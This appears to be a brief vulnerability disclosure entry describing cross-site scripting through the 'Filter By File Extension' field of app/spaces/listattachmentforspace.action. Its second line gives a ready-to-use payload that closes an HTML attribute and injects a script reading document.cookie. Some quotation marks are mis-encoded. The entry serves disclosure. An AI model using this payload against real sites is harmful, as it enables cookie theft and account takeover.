Description: XSS via the βFilter By File Extensionβ field in app/spaces/listattachmentforspace.action.
Exploit: blah"><script>alert(document.cookie)</script><x x="